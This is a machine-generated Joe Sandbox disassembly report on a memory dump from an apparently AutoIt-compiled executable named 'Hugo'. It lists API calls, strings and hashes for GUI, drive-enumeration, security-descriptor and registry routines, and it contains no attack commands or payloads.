GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F937DD
GlobalLock.KERNEL32(00000000), ref: 00F937E6
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F937F5
GlobalUnlock.KERNEL32(00000000), ref: 00F937FE
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F93805
GlobalFree.KERNEL32(00000000), ref: 00F93810
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F93822
OleLoadPicture.OLEAUT32(?,00000000,00000000,00FB0C04,00000000), ref: 00F93838
GlobalFree.KERNEL32(00000000), ref: 00F93848
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00F9386E
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00F9388D
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F938AF
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F93A9C

Strings

, xrefs: 00F93A22
DISPLAY, xrefs: 00F938FF
AutoIt v3, xrefs: 00F9374F
static, xrefs: 00F93797, 00F938EE

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: aab71c5600c8ca05c9f175c5c34d60fac556d3d619fb432c5fd46eaef887f68e
Instruction ID: eff5f8cf8feae32721f2ceda13514b2f23ef80466f24e0e65afb1fadd866ee64
Opcode Fuzzy Hash: aab71c5600c8ca05c9f175c5c34d60fac556d3d619fb432c5fd46eaef887f68e
Instruction Fuzzy Hash: 09025FB1900209AFDB14DF64CD89EAE7BB9EF49310F048158F9169B2A0DB74ED41EF60

Function 00FA7B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00FA7B67
GetSysColorBrush.USER32(0000000F), ref: 00FA7B98
GetSysColor.USER32(0000000F), ref: 00FA7BA4
SetBkColor.GDI32(?,000000FF), ref: 00FA7BBE
SelectObject.GDI32(?,?), ref: 00FA7BCD
InflateRect.USER32(?,000000FF,000000FF), ref: 00FA7BF8
GetSysColor.USER32(00000010), ref: 00FA7C00
CreateSolidBrush.GDI32(00000000), ref: 00FA7C07
FrameRect.USER32(?,?,00000000), ref: 00FA7C16
DeleteObject.GDI32(00000000), ref: 00FA7C1D
InflateRect.USER32(?,000000FE,000000FE), ref: 00FA7C68
FillRect.USER32(?,?,?), ref: 00FA7C9A
GetWindowLongW.USER32(?,000000F0), ref: 00FA7CBC

Part of subcall function 00FA7E22: GetSysColor.USER32(00000012), ref: 00FA7E5B
Part of subcall function 00FA7E22: SetTextColor.GDI32(?,00FA7B2D), ref: 00FA7E5F
Part of subcall function 00FA7E22: GetSysColorBrush.USER32(0000000F), ref: 00FA7E75
Part of subcall function 00FA7E22: GetSysColor.USER32(0000000F), ref: 00FA7E80
Part of subcall function 00FA7E22: GetSysColor.USER32(00000011), ref: 00FA7E9D
Part of subcall function 00FA7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FA7EAB
Part of subcall function 00FA7E22: SelectObject.GDI32(?,00000000), ref: 00FA7EBC
Part of subcall function 00FA7E22: SetBkColor.GDI32(?,?), ref: 00FA7EC5
Part of subcall function 00FA7E22: SelectObject.GDI32(?,?), ref: 00FA7ED2
Part of subcall function 00FA7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00FA7EF1
Part of subcall function 00FA7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FA7F08
Part of subcall function 00FA7E22: GetWindowLongW.USER32(?,000000F0), ref: 00FA7F15

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 37fcca05d9cd95f70bb0b9094097344ae1b9ca20ded4720b1d99e66361b0f721
Instruction ID: 57c246fb497c571d9d807a0f9030463821f084e0947885eadaa9e8663ff4c592
Opcode Fuzzy Hash: 37fcca05d9cd95f70bb0b9094097344ae1b9ca20ded4720b1d99e66361b0f721
Instruction Fuzzy Hash: CEA1B2B2408305BFDB10AF64DC48E6BBBA9FF8A330F140A19F962965E0D771D944EB51

Function 00F11625 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00F116B4
SendMessageW.USER32(?,00001308,?,00000000), ref: 00F52B07
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F52B40
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F52F85

Part of subcall function 00F11802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F11488,?,00000000,?,?,?,?,00F1145A,00000000,?), ref: 00F11865

SendMessageW.USER32(?,00001053), ref: 00F52FC1
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F52FD8
ImageList_Destroy.COMCTL32(00000000,?), ref: 00F52FEE
ImageList_Destroy.COMCTL32(00000000,?), ref: 00F52FF9

Strings

0, xrefs: 00F52E11

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: db280fe36b647a038cc6d3058c486cdcd643e28aa2f802266299db350913d09a
Instruction ID: 905ce3e0909e15a21c520513fee078250db3789707b6d49efbb675eba8b73abd
Opcode Fuzzy Hash: db280fe36b647a038cc6d3058c486cdcd643e28aa2f802266299db350913d09a
Instruction Fuzzy Hash: 8A12D230A002459FC765CF14C884BA9B7F5FB46322F184269FA55DB662C731EC8AFB91

Function 00F9316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00F9319B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F932C7
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00F93306
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00F93316
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00F9335D
GetClientRect.USER32(00000000,?), ref: 00F93369
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00F933B2
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F933C1
GetStockObject.GDI32(00000011), ref: 00F933D1
SelectObject.GDI32(00000000,00000000), ref: 00F933D5
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00F933E5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F933EE
DeleteDC.GDI32(00000000), ref: 00F933F7
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F93423
SendMessageW.USER32(00000030,00000000,00000001), ref: 00F9343A
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00F9347A
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F9348E
SendMessageW.USER32(00000404,00000001,00000000), ref: 00F9349F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00F934D4
GetStockObject.GDI32(00000011), ref: 00F934DF
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F934EA
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00F934F4

Strings

DISPLAY, xrefs: 00F933B7
AutoIt v3, xrefs: 00F93355
static, xrefs: 00F933AC, 00F934CE
msctls_progress32, xrefs: 00F93470

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 7a26c6f161e6233bdb72ab59e00529d18eaacaf729aec698f835e3211b03d443
Instruction ID: 2a6287881bafaa0d043aee90f111ca30f4552697c02afb294e4643a9dfb8c94b
Opcode Fuzzy Hash: 7a26c6f161e6233bdb72ab59e00529d18eaacaf729aec698f835e3211b03d443
Instruction Fuzzy Hash: BEB14EB1A40219AFEB14DFA8DC89FAF7BB9EB49710F004115F915EB290D774AD40EB90

Function 00F85524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00F85532
GetDriveTypeW.KERNEL32(?,00FADC30,?,\\.\,00FADCD0), ref: 00F8560F
SetErrorMode.KERNEL32(00000000,00FADC30,?,\\.\,00FADCD0), ref: 00F8577B

Strings

ATA, xrefs: 00F856DD
FileBackedVirtual, xrefs: 00F85731
Virtual, xrefs: 00F8572A
SATA, xrefs: 00F85715
CDROM, xrefs: 00F85640
SSA, xrefs: 00F856EB
USB, xrefs: 00F856F9
Fibre, xrefs: 00F856F2
Fixed, xrefs: 00F8564E
SSD, xrefs: 00F8568F
Network, xrefs: 00F85647
MMC, xrefs: 00F85723
iSCSI, xrefs: 00F85707
Unknown, xrefs: 00F85632, 00F856C8
PhysicalDrive, xrefs: 00F855BB
SAS, xrefs: 00F8570E
SCSI, xrefs: 00F856CF
Removable, xrefs: 00F85655, 00F8565A
1394, xrefs: 00F856E4
RAMDisk, xrefs: 00F85639
\\.\, xrefs: 00F85584
RAID, xrefs: 00F85700
ATAPI, xrefs: 00F856D6

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: cac8005f95bd7827739fbdb168c308152bfb40597eb5e35f2caf303fb40c3b2e
Instruction ID: 299a58c69d1802b33d3b563bc457e8b000c2c2015afc7cf7cbd1a00b627f89af
Opcode Fuzzy Hash: cac8005f95bd7827739fbdb168c308152bfb40597eb5e35f2caf303fb40c3b2e
Instruction Fuzzy Hash: 6A61B331A04A09DBC724FF24CD91AFDB7A2AF54B64BA88056E406AF351E731DD41FB42

Function 00FA1A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00FA1BC4
GetDesktopWindow.USER32 ref: 00FA1BD9
GetWindowRect.USER32(00000000), ref: 00FA1BE0
GetWindowLongW.USER32(?,000000F0), ref: 00FA1C35
DestroyWindow.USER32(?), ref: 00FA1C55
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00FA1C89
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FA1CA7
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FA1CB9
SendMessageW.USER32(00000000,00000421,?,?), ref: 00FA1CCE
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00FA1CE1
IsWindowVisible.USER32(00000000), ref: 00FA1D3D
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00FA1D58
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00FA1D6C
GetWindowRect.USER32(00000000,?), ref: 00FA1D84
MonitorFromPoint.USER32(?,?,00000002), ref: 00FA1DAA
GetMonitorInfoW.USER32(00000000,?), ref: 00FA1DC4
CopyRect.USER32(?,?), ref: 00FA1DDB
SendMessageW.USER32(00000000,00000412,00000000), ref: 00FA1E46

Strings

(, xrefs: 00FA1DB7
0, xrefs: 00FA1B6F
tooltips_class32, xrefs: 00FA1C82

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 144705cd1d65885e0c3df31e4961f1a1a4dace5149dc363f98a9f97b4ed8e8c8
Instruction ID: ee96bf74d355cac7da193c1b137c5180559d75be832f5ad56384800963184c1a
Opcode Fuzzy Hash: 144705cd1d65885e0c3df31e4961f1a1a4dace5149dc363f98a9f97b4ed8e8c8
Instruction Fuzzy Hash: 1BB19FB1604301AFD714DF64C985B9BBBE5FF85360F00891CF99A9B291C731E844EB92

Function 00FA0CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00FA0D81
_wcslen.LIBCMT ref: 00FA0DBB
_wcslen.LIBCMT ref: 00FA0E25
_wcslen.LIBCMT ref: 00FA0E8D
_wcslen.LIBCMT ref: 00FA0F11
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00FA0F61
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FA0FA0

Part of subcall function 00F2FD52: _wcslen.LIBCMT ref: 00F2FD5D

Part of subcall function 00F72B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F72BA5
Part of subcall function 00F72B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F72BD7

Strings

GETTEXT, xrefs: 00FA0E88, 00FA0EA3
VIEWCHANGE, xrefs: 00FA1111
GETSELECTEDCOUNT, xrefs: 00FA0F0C, 00FA0F27
SELECTALL, xrefs: 00FA0FB1
GETSELECTED, xrefs: 00FA107D
GETSUBITEMCOUNT, xrefs: 00FA0E20, 00FA0E3B
SELECTINVERT, xrefs: 00FA101A
SELECT, xrefs: 00FA0FE4
DESELECT, xrefs: 00FA1038
SELECTCLEAR, xrefs: 00FA0FC9
ISSELECTED, xrefs: 00FA0F79
GETITEMCOUNT, xrefs: 00FA0DB2, 00FA0DD3
FINDITEM, xrefs: 00FA10C3

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 9b4003f80f5c8ed2e1abc91218448fdb6854447f70d32363084cd142e4d8a5cc
Instruction ID: 6e1f9eb560cec0208eeac59734c4fed57e103ac7a2fa08d50e7ddee555e702bc
Opcode Fuzzy Hash: 9b4003f80f5c8ed2e1abc91218448fdb6854447f70d32363084cd142e4d8a5cc
Instruction Fuzzy Hash: FAE127726143018FC714DF24C85096AB3E6FF86364F04892DF896973A2DB34ED45EB92

Function 00F12521 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F125F8
GetSystemMetrics.USER32(00000007), ref: 00F12600
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F1262B
GetSystemMetrics.USER32(00000008), ref: 00F12633
GetSystemMetrics.USER32(00000004), ref: 00F12658
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F12675
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F12685
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F126B8
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F126CC
GetClientRect.USER32(00000000,000000FF), ref: 00F126EA
GetStockObject.GDI32(00000011), ref: 00F12706
SendMessageW.USER32(00000000,00000030,00000000), ref: 00F12711

Part of subcall function 00F119CD: GetCursorPos.USER32(?), ref: 00F119E1
Part of subcall function 00F119CD: ScreenToClient.USER32(00000000,?), ref: 00F119FE
Part of subcall function 00F119CD: GetAsyncKeyState.USER32(00000001), ref: 00F11A23
Part of subcall function 00F119CD: GetAsyncKeyState.USER32(00000002), ref: 00F11A3D

SetTimer.USER32(00000000,00000000,00000028,00F1199C), ref: 00F12738

Strings

AutoIt v3 GUI, xrefs: 00F126B0

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 87e5aaef05aa50e6b5ffb89c0a1baf32f0db344335c8abf50b04f55568917816
Instruction ID: 0302091621764e43c231f869160a44432f2ea2f4f27e240a117df84d70982c6d
Opcode Fuzzy Hash: 87e5aaef05aa50e6b5ffb89c0a1baf32f0db344335c8abf50b04f55568917816
Instruction Fuzzy Hash: 0FB19EB1A002099FDB54DFA8CC85BEE7BB5FB48325F104129FA16AB290DB74D940EF51

Function 00F716D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F71A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F71A60
Part of subcall function 00F71A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F714E7,?,?,?), ref: 00F71A6C
Part of subcall function 00F71A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F714E7,?,?,?), ref: 00F71A7B
Part of subcall function 00F71A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F714E7,?,?,?), ref: 00F71A82
Part of subcall function 00F71A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F71A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F71741
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F71775
GetLengthSid.ADVAPI32(?), ref: 00F7178C
GetAce.ADVAPI32(?,00000000,?), ref: 00F717C6
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F717E2
GetLengthSid.ADVAPI32(?), ref: 00F717F9
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F71801
HeapAlloc.KERNEL32(00000000), ref: 00F71808
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F71829
CopySid.ADVAPI32(00000000), ref: 00F71830
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F7185F
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F71881
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F71893
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F718BA
HeapFree.KERNEL32(00000000), ref: 00F718C1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F718CA
HeapFree.KERNEL32(00000000), ref: 00F718D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F718DA
HeapFree.KERNEL32(00000000), ref: 00F718E1
GetProcessHeap.KERNEL32(00000000,?), ref: 00F718ED
HeapFree.KERNEL32(00000000), ref: 00F718F4

Part of subcall function 00F71ADF: GetProcessHeap.KERNEL32(00000008,00F714FD,?,00000000,?,00F714FD,?), ref: 00F71AED
Part of subcall function 00F71ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F714FD,?), ref: 00F71AF4
Part of subcall function 00F71ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F714FD,?), ref: 00F71B03

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 62fc2fe9e8656f4c069d9d1b0fdbff4e6eca460291bb0755853d3f7c1cb702d4
Instruction ID: fb77a890b6fe22cf43d91e932e70e53917ed3fbe68d35395a0871544dceec32e
Opcode Fuzzy Hash: 62fc2fe9e8656f4c069d9d1b0fdbff4e6eca460291bb0755853d3f7c1cb702d4
Instruction Fuzzy Hash: 9A714FB1D00209ABDF10DFA9DC44FEEBBB8BF05310F148226E919A6191D7359909DB62

Function 00F9CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F9CF1D
RegCreateKeyExW.ADVAPI32(?,?,00000000,00FADCD0,00000000,?,00000000,?,?), ref: 00F9CFA4
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00F9D004
_wcslen.LIBCMT ref: 00F9D054
_wcslen.LIBCMT ref: 00F9D0CF
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00F9D112
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00F9D221
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00F9D2AD
RegCloseKey.ADVAPI32(?), ref: 00F9D2E1
RegCloseKey.ADVAPI32(00000000), ref: 00F9D2EE
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00F9D3C0

Strings

REG_EXPAND_SZ, xrefs: 00F9D02D
REG_BINARY, xrefs: 00F9D373
REG_SZ, xrefs: 00F9D0A4
REG_QWORD, xrefs: 00F9D323
REG_DWORD, xrefs: 00F9D264
REG_MULTI_SZ, xrefs: 00F9D155

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 67575f83989472bda192d34f1e292d8b460d08eb9d7718cf5fb985d5651e2f83
Instruction ID: 29dcc95c8758e852a05e8feef5b99b26bd64b316cf23e918858cac7dd402f4fd
Opcode Fuzzy Hash: 67575f83989472bda192d34f1e292d8b460d08eb9d7718cf5fb985d5651e2f83
